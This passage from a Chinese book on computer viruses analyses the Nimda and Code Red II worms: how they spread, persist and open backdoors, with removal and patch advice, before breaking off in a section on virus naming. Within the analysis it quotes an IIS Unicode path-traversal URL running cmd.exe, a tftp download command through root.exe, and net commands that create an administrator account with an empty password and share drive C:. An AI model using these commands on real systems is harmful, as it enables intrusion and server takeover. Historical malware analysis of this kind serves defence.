按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
临时文件夹中读取所有〃htm〃,〃html〃文件并从中提取电子邮件地址, 从信箱读取电子邮件地址并从中提取SMTP服务器,然后发送readme。eml,这可比仅仅通过outlook传播要厉害和隐蔽得多。
(二)通过微软的unicode漏洞
在IIS 4。0和IIS 5。0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
对于IIS 5。0/4。0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如〃%c1%hh〃或者〃%c0%hh〃;它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00 (0xc1 … 0xc0) * 0x40 + 0xhh
%c0%hh …》 (0xc0 … 0xc0) * 0x40 + 0xhh
因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c …》 (0xc1 … 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f …》 (0xc0 … 0xc0) * 0x40 + 0x2f = 0x2f = ''
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
列出当前目录的内容:
victim/scripts/。。%c1%1c。。/winnt/system32/cmd。exe?/c+dir
利用这个漏洞查看系统文件内容也是可能的:
victim/a。asp/。。%c1%1c。。/。。%c1%1c。。/winnt/win。ini
(三)通过红色代码二代建立的root。exe
红色代码二代会在IIS的几个可执行目录下放置root。exe
也是尽人皆知,Nimda首先在udp/69上启动一个tftp服务器
然后会作以下扫描
一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root。exe?/c+tftp …i xxx。xxx。xxx。xxx GET Admin。dll HTTP/1。0
把文件传到主机上去,然后再GET /scripts/Admin。dll HTTP/1。0
(四)通过WWW服务 在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件 所在目录中创建readme。eml,并在文件末加上下面这一行 window。open(〃readme。eml〃; null; 〃resizable=no;top=6000;left=6000〃)
也就是说如果一台web服务器被感染了,那么大部分访问过此服务器的机器都会被感染。
(五)通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录,一但找到,就会把自身复制到目录中命名为riched20。dll(原理见前)
(六)以病毒的方式
搜索'SOFTWAREMicrosoftWindowsCurrentVersionApp Paths'寻找在远程主机上的可执行文件, 一旦找到,Nimda就会以病毒的方式感染文件。有一点不同的是,它把原文件作为资源存储在新文件中, 运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32。exe,它不会感染winzip32。exe, 应该是作者发现winzip染毒后不能正常运行,就过滤掉这个使用最为广泛的压缩程序。
如何运行的:
病毒采取以下措施确保自己在系统一开机之后就运行:
1)把自己复制到windows系统文件夹里命名为riched20。dll(原理见前)
2)把自己复制到windows系统文件夹里命名为load。exe,
修改system。ini把
shell=explorer。exe改为
shell=explorer。exe load。exe …dontrunold
使病毒在下次系统启动时运行。
安全灾难—创建后门:
1) 如果有足够权限将调用〃net。exe〃执行以下系统命令:
net user guest /add 增加一个guest用户
net user guest /active 激活guest用户
net user guest 〃〃 guest用户的密码为空
net localgroup Administrators guest 将guest加到管理员组中!太可怕了。
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2)如果有足够权限将调用〃net。exe〃执行以下系统命令:
net share c=c:
删除'SYSTEMCurrentControlSetServiceslanmanserverSharesSecurity'的所有子键
结果是C:设为完全共享。
作者是谁?
程序的作者在程序中留下了以下标记:
fsdhqherwqi2001
Concept Virus(CV) V。5; Copyright(C)2001 R。P。China
可能对最终找出作者有帮助。
从这些信息来看,似乎作者来自中国,但是在作者没有站出来承认之前,这些文字可以使任何人加在病毒代码里的。
为什么说尼姆达是〃概念〃蠕虫?
它可以通过至少六种方式传播
它是一个带exe扩展名的dll,可以做为可执行文件运行,也可作为dll运行。
它有智慧:当它名为Admin。dll被运行时,它会把自己复制到windows文件夹命名为mmc。exe并带上参数〃…qusery9bnow〃运行。
当它名为readme。exe被运行时,它会把自己复制到%temp%带上参数〃…dontrunold〃运行。
它会把自己的属性设为〃系统〃〃隐藏〃,再改写注册表,使〃系统〃〃隐藏〃属性的程序在资源管理器中不可见。
它是一个主机扫描器,一个弱点扫描器,一个后门程序;带有多个漏洞,掌握最新的安全信息;它就是一个黑客,人们把它称为“瑞士军刀”不是没有道理的。
如何清除尼姆达病毒?
在文件夹选项里设置〃显示所有文件〃
删除mmc。exe/load。exe/riched20。dll/admin。dll/readme。eml/readme。exe等所有蠕虫文件。
从原始安装盘中提取riched20。dll覆盖windows系统文件夹里的同名蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用〃查找〃工具,搜索包含〃fsdhqherwqi2001〃的*。exe/*。dll和包含〃Kz29vb29oWsrLPh4eisrPb09Pb2〃的*。eml/*。nws。
检查system。ini,去掉自动执行load。exe文件的行。
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。
删除C:的共享
重起系统
如何避免Nimda入侵?
根本之道是打补丁:
Unicode漏洞:microsoft/technet/security/bulletin/ms00…078。asp
MIME漏洞:microsoft/technet/security/bulletin/ms01…020。asp
IE5。01 SP2:microsoft/windows/ie/downloads/remended/ie501sp2/default。asp
IE5。5 SP2:microsoft/windows/ie/downloads/remended/ie501sp2/default。asp
其他解决方案:
打开IE的〃工具》internet选项》安全》自定义级别》文件下载〃选〃禁用〃。
删除所有不需要的默认虚拟目录,或者只给纯脚本执行权,最好不要把任何web目录放在系统分区。
检查共享设置,Win9X的机器不要开完全共享,可以开只读共享,所有共享都要设置口令。 由于尼姆达可以利用红色代码二代创建的后门,所以需打上针对红色代码二代的补丁,
检查C:和D: 有没有explorer。exe,检查web目录中有没有root。exe。
第二节 红色代码是红色的吗?
你知道吗,在“红色代码”流行之前,已经出现过“绿色代码”,而在“红色代码”之后,又出现了“蓝色代码”,这些五颜六色的东西的出现,仿佛宣告电脑病毒已经成为一种时尚,就像穿衣服有流行色一样,似乎病毒也有了自己的流行色。
实际上,从某种意义上,杀毒软件厂商对一种病毒进行分析之后,将其命名为“绿色代码”应该是引导这场时尚的先锋,因为这种命名,病毒作者故意在新的病毒里面包括了类似“Code Red”之类的字符,让病毒的发现者命名它为“红色代码”,病毒和反病毒共同引导了这场颜色的革命。
红色代码有一代和二代两种,我们重点分析二代:
红色代码二代于2001年8月首次发现,它是“红色代码”病毒的一个变种。
和“红色代码”一样,它也是利用缓冲区溢出传播到其他web服务器。由于收到了大量的因特网信息服务器(IIS Server)被感染的报告。我们把“红色代码二代”定为高度危险。
最早的“红色代码”曾经成功的攻击了白宫的主页,导致其拒绝服务。更进一步,“红色代码二代”可以使黑客在远程取得对服务器的完全控制。如果你使用因特网信息服务器(IIS Server);强烈建议你下载微软的关于〃红色代码二代〃的最新补丁:你可以在microsoft/technet/security/bulletin/MS01…033。asp 找到这个补丁。
当一个web 服务器被感染后,病毒的主线程检查两个标记,一个叫〃29A〃;用来确定是否安装Trojan。VirtualRoot;另一个标记是一个信号灯;这个信号灯的名字叫“红色代码二代”(Code Red II);如果这个信号灯存在,病毒就进入休眠状态。接下来,主线程检查系统的的缺省语种,如果是中文(包括简体和繁体),就创建600个线程,否则就创建300个线程(气死我了,为什么我们中国人的服务器要多创建一些线程?);这些线程产生随机IP地址,用来搜索新的因特网服务器,当这些线程开始工作之后,主线程把视窗 NT/2000系统目录下的cmd。exe 拷贝到下面一个存在的位置,
c:inetpubscriptsroot。exe
d:inetpubscriptsroot。exe
c:progra~1mon~1systemMSADCroot。exe
d:progra~1mon~1systemMSADCroot。exe
如果它携带的特洛伊木马能够修改下面的注册表:HKLMSYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots
这将使得黑客可通过向因特网服务器发送HTTP协议的GET 请求运行 scripts/root。exe 从而获得对服务器的完全控制。 在中文系统中主线程将休眠48小时其它系统中则是24小时(理解了,因为休息的时间长,所以线程要多一些);另外那300获或者00个线程则不断尝试攻击其他因特网服务器。当主线程一旦休眠时间一过,他将重新启动机器。另外,所有的线程都检查如果是十月或者是2002年也重启机器。
这个病毒拷贝cmd。exe 到IIS 缺省的可执行目录下从而导致web 服务器可被远程控制,同时他还在c: 或D:下创建一个属性为隐藏系统只读的文件 explorer。exe。这个特洛伊被诺顿以及江民公司命名为木马。虚拟根(Trojan。VirtualRoot)。
蠕虫把这个文件打包在自身中,并解包到被感染的机器上。传播将持续24或48小时直到机器被重启,同一台机器能被再次感染。当机器被重启后,Trojan。VirtualRoot 会被执行因为系统企图执行explorer。exe这取决于windows NT如何搜索执行文件,C:explorer。exe运行后首先休眠几分钟等待注册表都修改完毕。然后她会修改HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon SFCDisable
把它设为0xFFFFFF9D;这就关闭了系统启动时系统文件检查的功能(这家伙,注册表用的好熟悉啊)。
计算机病毒的命名。
为了方便的表示病毒的类型、名称(或者命名的原因)、和重要特征,一般而言,病毒的名称可以都可以分成三个部分:前缀 + 病毒名 + 后缀。
不同的反病毒厂商命名的方式不太一样,但是基本上都遵循这个三部分命名的规则。
前缀表示该病毒发作的操作平台或者病毒的类型,如果没有前缀,一般表示DOS操作系统下的病毒。 病毒名为该病毒的名称及其家族;后缀一般可以不要的,只是以此区别在该病毒家族中各病毒的不同,可以为字母表示病毒是某一个家族的第几种变种,或者为数字(数字一般是病毒的大小,以病毒的大小来区分同一家族的不同病毒变种)。例如:WM。Cap。A,A表示在Cap病毒家族中的一个变种,WM是Word Macro的缩写,表示该病毒是一个Word宏病毒。
各种前缀的意义如下(具体杀毒软件厂商在命名的时候使用的前缀是不同的,但是基本的内容肯定是一样的):
1。 WM: Word宏病毒,可以在Word6。0和Word95(Word7。0)下传播发作,也可以在Word97(Word8。0)或以上的 Word下传播发作,但该病毒不是在Word97制作完成的。
2。 W97M: Word97宏病毒,这些是在Word97下制作完成,并只在Word97或以上版本的或以上的Word传播发作。
3。 XM: Excel宏病毒在Excel5。0和Excel95下制作完成并传播发作,同样,此种病毒也可以在 Excel97或以上版本传播发 作。
4。 X97M: 在Exc